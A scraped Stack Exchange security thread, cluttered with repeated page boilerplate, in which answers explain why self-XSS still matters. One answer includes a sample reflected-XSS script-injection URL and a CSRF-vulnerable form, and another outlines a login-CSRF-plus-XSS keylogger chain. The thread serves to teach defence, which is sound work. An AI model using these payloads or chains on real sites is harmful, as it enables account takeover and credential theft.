How hard should I try to prevent a user from XSSing themselves? Announcing the arrival of Valued Associate #679: Cesar Manara Planned maintenance scheduled April 17/18, 2019 at 00:00UTC (8:00pm US/Eastern)How to best defend against Targeted Attacks?How to prevent my website from getting malware injection attacks?CodeIgniter CSRF confusionHow to prevent XSS from urlHow do the Stack Exchange sites protect themselves from XSS?How to prevent data from Interception?Safely downloading user submitted contentShould we prevent this login XSS attack?How to prevent XSS in user-generated content (html) without disabling scripts and CSSa mysterious & pointless long-term hacking attempt?

What does the "x" in "x86" represent?

Adverb for when you're not exaggerating

What does an IRS interview request entail when called in to verify expenses for a sole proprietor small business?

Denied boarding although I have proper visa and documentation. To whom should I make a complaint?

Using audio cues to encourage good posture

Does Amorayim read berayta in Gemara rather than recite it

Why do we bend a book to keep it straight?

Why didn't this character "real die" when they blew their stack out in Altered Carbon?

Why did the IBM 650 use bi-quinary?

What exactly is a "Meth" in Altered Carbon?

3 doors, three guards, one stone

How to remove list items depending on predecessor in python

Can I cast Passwall to drop an enemy into a 20-foot pit?

Fundamental Solution of the Pell Equation

Storing hydrofluoric acid before the invention of plastics

Is the Standard Deduction better than Itemized when both are the same amount?

How to call a function with default parameter through a pointer to function that is the return of another function?

Ring Automorphisms that fix 1.

What is Wonderstone and are there any references to it pre-1982?

String `!23` is replaced with `docker` in command line

Is "Reachable Object" really an NP-complete problem?

Tht Aain’t Right... #2

Why was the term "discrete" used in discrete logarithm?

What is the meaning of the new sigil in Game of Thrones Season 8 intro?



How hard should I try to prevent a user from XSSing themselves?



Announcing the arrival of Valued Associate #679: Cesar Manara
Planned maintenance scheduled April 17/18, 2019 at 00:00UTC (8:00pm US/Eastern)How to best defend against Targeted Attacks?How to prevent my website from getting malware injection attacks?CodeIgniter CSRF confusionHow to prevent XSS from urlHow do the Stack Exchange sites protect themselves from XSS?How to prevent data from Interception?Safely downloading user submitted contentShould we prevent this login XSS attack?How to prevent XSS in user-generated content (html) without disabling scripts and CSSa mysterious & pointless long-term hacking attempt?



.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;








59















Let's say a user can store some data in a web app. I'm now only talking about that sort of data the user can THEMSELVES view, not that is intended to be viewed by other users of the webapp. (Or if other users may view this data then it is handled to them in a more secure way.)



How horrible would it be to allow some XSS vulnerability in this data?



Of course, a purist's answer would clearly be: "No vulnerabilities are allowed". But honestly - why?



Everything that is allowed is the user XSSing THEMSELVES. What's the harm here? Other users are protected. And I can't see a reason why would someone mount an attack against themselves (except if it is a harmless one, in which case - again - no harm is done).



My gut feelings are that the above reasoning will raise some eyebrows... OK, then what am I failing to see?










share|improve this question



















  • 8





    How can you limit the scope of an XSS vuln to just some data? This is asking to open the door to everything getting compromised. Don't be lazy with it

    – Crumblez
    Apr 1 at 20:21






  • 18





    Can you be absolutely certain that the data will never be shown to any other user, especially including site admins?

    – pjc50
    Apr 2 at 8:20






  • 9





    Also: You write "How badly should I try" - that looks like you believe preventing XSS will be difficult. Why is that? Normally, properly escaping everything on output shoudl be enough.

    – sleske
    Apr 2 at 8:24






  • 12





    How often do you think people randomly copy&paste stuff from the internet? Ever heard of social engineering? Allowing self XSS is equivalent to allowing full XSS, IMHO.

    – Giacomo Alzetta
    Apr 2 at 12:31






  • 1





    @pjc50 - This exactly! The problem with programming something insecure/risky with the thought "well, it's not technically a problem because of XYZ" - is that you have to remember XYZ for perpetuity. "We got a new request - users want to be able to browse the formerly-private profile pages of each other." "We got a new request - admins need to be able to browse user content pages." "We got a new request - each day we want to grab the 'Inspirational Quote' from a random user and put it below our main banner". Etc.

    – Kevin
    Apr 4 at 15:00

















59















Let's say a user can store some data in a web app. I'm now only talking about that sort of data the user can THEMSELVES view, not that is intended to be viewed by other users of the webapp. (Or if other users may view this data then it is handled to them in a more secure way.)



How horrible would it be to allow some XSS vulnerability in this data?



Of course, a purist's answer would clearly be: "No vulnerabilities are allowed". But honestly - why?



Everything that is allowed is the user XSSing THEMSELVES. What's the harm here? Other users are protected. And I can't see a reason why would someone mount an attack against themselves (except if it is a harmless one, in which case - again - no harm is done).



My gut feelings are that the above reasoning will raise some eyebrows... OK, then what am I failing to see?










share|improve this question



















  • 8





    How can you limit the scope of an XSS vuln to just some data? This is asking to open the door to everything getting compromised. Don't be lazy with it

    – Crumblez
    Apr 1 at 20:21






  • 18





    Can you be absolutely certain that the data will never be shown to any other user, especially including site admins?

    – pjc50
    Apr 2 at 8:20






  • 9





    Also: You write "How badly should I try" - that looks like you believe preventing XSS will be difficult. Why is that? Normally, properly escaping everything on output shoudl be enough.

    – sleske
    Apr 2 at 8:24






  • 12





    How often do you think people randomly copy&paste stuff from the internet? Ever heard of social engineering? Allowing self XSS is equivalent to allowing full XSS, IMHO.

    – Giacomo Alzetta
    Apr 2 at 12:31






  • 1





    @pjc50 - This exactly! The problem with programming something insecure/risky with the thought "well, it's not technically a problem because of XYZ" - is that you have to remember XYZ for perpetuity. "We got a new request - users want to be able to browse the formerly-private profile pages of each other." "We got a new request - admins need to be able to browse user content pages." "We got a new request - each day we want to grab the 'Inspirational Quote' from a random user and put it below our main banner". Etc.

    – Kevin
    Apr 4 at 15:00













59












59








59


16






Let's say a user can store some data in a web app. I'm now only talking about that sort of data the user can THEMSELVES view, not that is intended to be viewed by other users of the webapp. (Or if other users may view this data then it is handled to them in a more secure way.)



How horrible would it be to allow some XSS vulnerability in this data?



Of course, a purist's answer would clearly be: "No vulnerabilities are allowed". But honestly - why?



Everything that is allowed is the user XSSing THEMSELVES. What's the harm here? Other users are protected. And I can't see a reason why would someone mount an attack against themselves (except if it is a harmless one, in which case - again - no harm is done).



My gut feelings are that the above reasoning will raise some eyebrows... OK, then what am I failing to see?










share|improve this question
















Let's say a user can store some data in a web app. I'm now only talking about that sort of data the user can THEMSELVES view, not that is intended to be viewed by other users of the webapp. (Or if other users may view this data then it is handled to them in a more secure way.)



How horrible would it be to allow some XSS vulnerability in this data?



Of course, a purist's answer would clearly be: "No vulnerabilities are allowed". But honestly - why?



Everything that is allowed is the user XSSing THEMSELVES. What's the harm here? Other users are protected. And I can't see a reason why would someone mount an attack against themselves (except if it is a harmless one, in which case - again - no harm is done).



My gut feelings are that the above reasoning will raise some eyebrows... OK, then what am I failing to see?







xss attacks






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Apr 5 at 5:47









SeldomNeedy

1154




1154










asked Apr 1 at 20:04









gaazkamgaazkam

1,62631121




1,62631121







  • 8





    How can you limit the scope of an XSS vuln to just some data? This is asking to open the door to everything getting compromised. Don't be lazy with it

    – Crumblez
    Apr 1 at 20:21






  • 18





    Can you be absolutely certain that the data will never be shown to any other user, especially including site admins?

    – pjc50
    Apr 2 at 8:20






  • 9





    Also: You write "How badly should I try" - that looks like you believe preventing XSS will be difficult. Why is that? Normally, properly escaping everything on output shoudl be enough.

    – sleske
    Apr 2 at 8:24






  • 12





    How often do you think people randomly copy&paste stuff from the internet? Ever heard of social engineering? Allowing self XSS is equivalent to allowing full XSS, IMHO.

    – Giacomo Alzetta
    Apr 2 at 12:31






  • 1





    @pjc50 - This exactly! The problem with programming something insecure/risky with the thought "well, it's not technically a problem because of XYZ" - is that you have to remember XYZ for perpetuity. "We got a new request - users want to be able to browse the formerly-private profile pages of each other." "We got a new request - admins need to be able to browse user content pages." "We got a new request - each day we want to grab the 'Inspirational Quote' from a random user and put it below our main banner". Etc.

    – Kevin
    Apr 4 at 15:00












  • 8





    How can you limit the scope of an XSS vuln to just some data? This is asking to open the door to everything getting compromised. Don't be lazy with it

    – Crumblez
    Apr 1 at 20:21






  • 18





    Can you be absolutely certain that the data will never be shown to any other user, especially including site admins?

    – pjc50
    Apr 2 at 8:20






  • 9





    Also: You write "How badly should I try" - that looks like you believe preventing XSS will be difficult. Why is that? Normally, properly escaping everything on output shoudl be enough.

    – sleske
    Apr 2 at 8:24






  • 12





    How often do you think people randomly copy&paste stuff from the internet? Ever heard of social engineering? Allowing self XSS is equivalent to allowing full XSS, IMHO.

    – Giacomo Alzetta
    Apr 2 at 12:31






  • 1





    @pjc50 - This exactly! The problem with programming something insecure/risky with the thought "well, it's not technically a problem because of XYZ" - is that you have to remember XYZ for perpetuity. "We got a new request - users want to be able to browse the formerly-private profile pages of each other." "We got a new request - admins need to be able to browse user content pages." "We got a new request - each day we want to grab the 'Inspirational Quote' from a random user and put it below our main banner". Etc.

    – Kevin
    Apr 4 at 15:00







8




8





How can you limit the scope of an XSS vuln to just some data? This is asking to open the door to everything getting compromised. Don't be lazy with it

– Crumblez
Apr 1 at 20:21





How can you limit the scope of an XSS vuln to just some data? This is asking to open the door to everything getting compromised. Don't be lazy with it

– Crumblez
Apr 1 at 20:21




18




18





Can you be absolutely certain that the data will never be shown to any other user, especially including site admins?

– pjc50
Apr 2 at 8:20





Can you be absolutely certain that the data will never be shown to any other user, especially including site admins?

– pjc50
Apr 2 at 8:20




9




9





Also: You write "How badly should I try" - that looks like you believe preventing XSS will be difficult. Why is that? Normally, properly escaping everything on output shoudl be enough.

– sleske
Apr 2 at 8:24





Also: You write "How badly should I try" - that looks like you believe preventing XSS will be difficult. Why is that? Normally, properly escaping everything on output shoudl be enough.

– sleske
Apr 2 at 8:24




12




12





How often do you think people randomly copy&paste stuff from the internet? Ever heard of social engineering? Allowing self XSS is equivalent to allowing full XSS, IMHO.

– Giacomo Alzetta
Apr 2 at 12:31





How often do you think people randomly copy&paste stuff from the internet? Ever heard of social engineering? Allowing self XSS is equivalent to allowing full XSS, IMHO.

– Giacomo Alzetta
Apr 2 at 12:31




1




1





@pjc50 - This exactly! The problem with programming something insecure/risky with the thought "well, it's not technically a problem because of XYZ" - is that you have to remember XYZ for perpetuity. "We got a new request - users want to be able to browse the formerly-private profile pages of each other." "We got a new request - admins need to be able to browse user content pages." "We got a new request - each day we want to grab the 'Inspirational Quote' from a random user and put it below our main banner". Etc.

– Kevin
Apr 4 at 15:00





@pjc50 - This exactly! The problem with programming something insecure/risky with the thought "well, it's not technically a problem because of XYZ" - is that you have to remember XYZ for perpetuity. "We got a new request - users want to be able to browse the formerly-private profile pages of each other." "We got a new request - admins need to be able to browse user content pages." "We got a new request - each day we want to grab the 'Inspirational Quote' from a random user and put it below our main banner". Etc.

– Kevin
Apr 4 at 15:00










9 Answers
9






active

oldest

votes


















105














This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.






share|improve this answer


















  • 7





    I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

    – user7393973
    Apr 2 at 8:17






  • 34





    It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

    – reed
    Apr 2 at 9:54






  • 19





    @MasonWheeler Why would you be disturbed by that specific thing?

    – Sumurai8
    Apr 2 at 15:24






  • 42





    @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

    – Alex
    Apr 2 at 15:49






  • 6





    @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

    – Felipe Warrener-Iglesias
    Apr 3 at 8:27


















39














Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



<html>
<head><title>HI</title></head>
<body>
<h1>WEBSITE</h1>
Hey my name is <travis>.
</body>
</html>


Note that when this website is rendered, the word 'travis', is not rendered.






share|improve this answer




















  • 1





    This is the real issue

    – DreamConspiracy
    Apr 2 at 7:03






  • 19





    They're both real issues.

    – Lightness Races in Orbit
    Apr 2 at 12:34






  • 28





    Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

    – SeldomNeedy
    Apr 2 at 22:01







  • 6





    Poor little Bobby Tables

    – Wayne Werner
    Apr 3 at 11:31






  • 4





    @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

    – meowcat
    Apr 3 at 21:18


















16














If the only way to insert malicious code is to literally type it on your webpage, then the attack vector would be "self xss", which was mentioned in another answer, and which is a social engineering attack you can't really prevent.



But if malicious code can also be loaded in other ways on your page, then you have a bigger problem. For example, if your website is vulnerable to reflected XSS or CSRF, an attacker can use those to make the user load malicious code.



Example of reflected XSS: if the data parameter is printed on the page without sanitizing it, an attacker can make the victim browse to the following URL to make them load malicious code.



https://www.example.com/search?data=<script src="..."></script>


Example of CSRF: if the submitted data is then printed on the page without sanitizing it and there's also no protection against CSRF, an attacker can make the victim post malicious data.



<form method="post" action="submit">
<input type="text" name="title">
<input type="text" name="note">
<input type="submit" value="submit">
<!-- NO TOKEN TO PREVENT CSRF HERE!!! -->
</form>


As you can see the problem is not only "who can see the data", but also "who can enter the data". But even if you were sure that the above examples don't apply to your situation, why should you still try to avoid XSS and always try to sanitize the data? Because sanitization should become a habit even if in some situations it might not seem really useful. If sanitization is not a habit, sooner or later you will forget to sanitize something that eventually leads to XSS.






share|improve this answer






























    11














    XSS is still bad, even if it the payload is tied to the account that created it. Sure, it's not as bad as "ordinary" XSS, but it's still not harmless.



    Here's an example of an attack: First, I need to get the victim to login as me. This can done through social engineering or login CSRF if there is no protection against that. Second, I have the victim visit the affected page logged in as me. The script then adds a keylogger to the site, so when the victim logs out and tries to login as themself, I get sent their password.



    There are many reasons an attack like this would fail, but it might just work. You should plug any and all XSS holes, no matter where they are.






    share|improve this answer


















    • 1





      I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

      – Carl Leth
      Apr 4 at 8:21


















    5














    I think there is another use case that may not be listed in the answers so far which is the accidental self XSS. Some users may run into an issue that they encounter on a site and may start googling for drop-in solutions that they copy and paste. Carefully crafted "solutions" could cause trouble.



    The scope of the attack is for the user to accidentally self-harm, but would be unlikely to harm other users. This is similar to how it can be dangerous to copy and paste bash commands that you find on the internet. A malicious site might offer linux help, but subtely include some command that might exfiltrate user data in some way.






    share|improve this answer






























      4














      Allowing ostensibly "self-XSS" attacks may have secondary ramifications.



      As an example, I recently saw an issue where a text field would, according the the bug report, remove all text after a Less-Than Sign. The browser was interpreting the Less-Than Sign as the start of an HTML tag.



      Another issue that I've seen is that such "self-XSS" fields do not allow any arbitrary valid input. For instance, consider a "notes" field, in which the user may wish to store something that they learned:



      One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>


      If your application allows "self-XSS" attacks, then the user will have difficulty adding such a note.






      share|improve this answer
































        1














        Something not mentioned in other answers, is the potential secondary security issues that can arise from a self-XSS.



        Suppose your app has some really powerful/dangerous functionality that requires the user to enter their password again, such as changing an old password, or allowing a third-party to access their account. An attacker might gain access to the account temporarily via an attack like cookie-jacking, idle session (user away from their desk), or a cross-site-request-forgery (CSRF). In any of these cases the attacker wouldn't be able to directly perform these powerful actions because they wouldn't know the users password. However, they could take advantage of the self-XSS vulnerability to perform a very convincing social-engineering attack to get the users credentials or setup an XSS payload to give them persistent access to the user's account (every time the user logs in).



        In the case of CSRF, a relatively harmless action might be transformed into a powerful attack by using the CSRF to cause a stored self-XSS that then gives the attacker access to the user's cookies, or browser session. I've actually used this attack chain technique several times when demonstrating vulnerabilities to developers.






        share|improve this answer
































          1














          There are some great answers here from a pure security perspective. The self-XSS angle is absolutely correct, even if the top one related to that didn't explicitly make the connection it implies.



          Being, essentially, that if people can get tricked into dropping self-XSS code into the dev console, why would you expect them not to not get tricked into dropping into some input element in your UI?



          Some other answers tie that together into how this can create broader issues when it (imo, inevitably, if someone gets tricked into self-XSSing) leads to account compromises.



          I think those are probably the top, immediate reasons. But I'd still like to address this from another angle:



          Development Practices: Implications of Allowing Self-XSS




          Let's say a user can store some data in a web app. I'm now only
          talking about that sort of data the user can THEMSELVES view, not that
          is intended to be viewed by other users of the webapp.




          The problem with your supposition here is that it assumes that you don't prevent XSS on all output of user provided data as a default practice: ideally as the default output mechanism of the class or function used to retrieve and output data, with any deviation requiring a specific parameter to select the different output filtering method.



          If you don't have your application coded in such a way that the default method of output prevents XSS (and different output targets such as attributes versus elements require different methodologies for what is and isn't allowed, hence 'default'), and it requires more effort (not less) to target output to allow (hopefully whitelisted, "purified") something to go through as native HTML/etc...



          How sure are you that you aren't going to have an accident where some reflection of user data back to the web doesn't allow XSS outside of just "data the user can THEMSELVES view"?



          Because mistakes happen. People forget steps when writing code. Failures occur in training where key points or even topics get missed. Some people do not "RTFM": even developers. Your application architecture/framework should be all about making sure that the path of least resistance when writing code is always the safest outcome, not the least safe outcome.



          Allowing XSS to potentially occur based on user input should require a positive action, an explicit choice by the developer in relation to each place this might occur, not simply be the basic, default outcome of pulling stored user data and reflecting it back out. If your code is not being written like this, where it prevents XSS by default and requires an override parameter of some kind to disable this output purifying, then it's a sign that you need to re-evaluate your process.






          share|improve this answer






























            0














            Although in this context we focus on the technical consequences of allowing a self-XSS, we should also take into consideration the impact of such a thing as a business: a self-XSS could cause unexpected behaviours (affecting user experience), so how should a user feel/react when running into it?



            Furthermore, considering that an XSS vulnerability is easily avoidable, is it really worth not to worry about it? Just think about any possible consequence: opened support tickets, reported bugs, user discontent, ..?






            share|improve this answer























              Your Answer








              StackExchange.ready(function()
              var channelOptions =
              tags: "".split(" "),
              id: "162"
              ;
              initTagRenderer("".split(" "), "".split(" "), channelOptions);

              StackExchange.using("externalEditor", function()
              // Have to fire editor after snippets, if snippets enabled
              if (StackExchange.settings.snippets.snippetsEnabled)
              StackExchange.using("snippets", function()
              createEditor();
              );

              else
              createEditor();

              );

              function createEditor()
              StackExchange.prepareEditor(
              heartbeatType: 'answer',
              autoActivateHeartbeat: false,
              convertImagesToLinks: false,
              noModals: true,
              showLowRepImageUploadWarning: true,
              reputationToPostImages: null,
              bindNavPrevention: true,
              postfix: "",
              imageUploader:
              brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
              contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
              allowUrls: true
              ,
              noCode: true, onDemand: true,
              discardSelector: ".discard-answer"
              ,immediatelyShowMarkdownHelp:true
              );



              );













              draft saved

              draft discarded


















              StackExchange.ready(
              function ()
              StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f206579%2fhow-hard-should-i-try-to-prevent-a-user-from-xssing-themselves%23new-answer', 'question_page');

              );

              Post as a guest















              Required, but never shown

























              9 Answers
              9






              active

              oldest

              votes








              9 Answers
              9






              active

              oldest

              votes









              active

              oldest

              votes






              active

              oldest

              votes









              105














              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.






              share|improve this answer


















              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27















              105














              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.






              share|improve this answer


















              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27













              105












              105








              105







              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.






              share|improve this answer













              This is actually a real concept, "Self XSS" which is sufficiently common that if you open https://facebook.com and then open the developer tools, they warn you about it as shown here



              Obviously Facebook is a specific type of target and whether this issue matters to you or not, would depend on the exact nature of your site, but you may not be able to discount the idea of one user using social engineering techniques to get another user to attack themselves.







              share|improve this answer












              share|improve this answer



              share|improve this answer










              answered Apr 1 at 20:28









              Rоry McCuneRоry McCune

              53.4k14114189




              53.4k14114189







              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27












              • 7





                I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

                – user7393973
                Apr 2 at 8:17






              • 34





                It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

                – reed
                Apr 2 at 9:54






              • 19





                @MasonWheeler Why would you be disturbed by that specific thing?

                – Sumurai8
                Apr 2 at 15:24






              • 42





                @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

                – Alex
                Apr 2 at 15:49






              • 6





                @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

                – Felipe Warrener-Iglesias
                Apr 3 at 8:27







              7




              7





              I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

              – user7393973
              Apr 2 at 8:17





              I believe the Discord app (program, not the browser version) has the same type of message if you open the console with the shortcut Ctrl + Shift + I.

              – user7393973
              Apr 2 at 8:17




              34




              34





              It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

              – reed
              Apr 2 at 9:54





              It's worth noting that this is a social engineering issue that would still exist even if the OP fixed all the vulnerabilities on their website. The user executes code in the console. In fact, IMO "self XSS" is a misnomer. Maybe we should call it "javascript scam" or something.

              – reed
              Apr 2 at 9:54




              19




              19





              @MasonWheeler Why would you be disturbed by that specific thing?

              – Sumurai8
              Apr 2 at 15:24





              @MasonWheeler Why would you be disturbed by that specific thing?

              – Sumurai8
              Apr 2 at 15:24




              42




              42





              @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

              – Alex
              Apr 2 at 15:49





              @MasonWheeler any JS from any website can output to the debug console with console.log and it's sister functions - they can't actually manipulate the devtools in any way

              – Alex
              Apr 2 at 15:49




              6




              6





              @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

              – Felipe Warrener-Iglesias
              Apr 3 at 8:27





              @MasonWheeler although you were a little off-base with your assumptions about some simple console-logging, your concern regarding Facebook messing with developer tools more than they need t is pretty reasonable. See this question regarding Facebook using a Chrome bug to disable the console, in order to combat scams: stackoverflow.com/questions/21692646/…

              – Felipe Warrener-Iglesias
              Apr 3 at 8:27













              39














              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.






              share|improve this answer




















              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18















              39














              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.






              share|improve this answer




















              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18













              39












              39








              39







              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.






              share|improve this answer















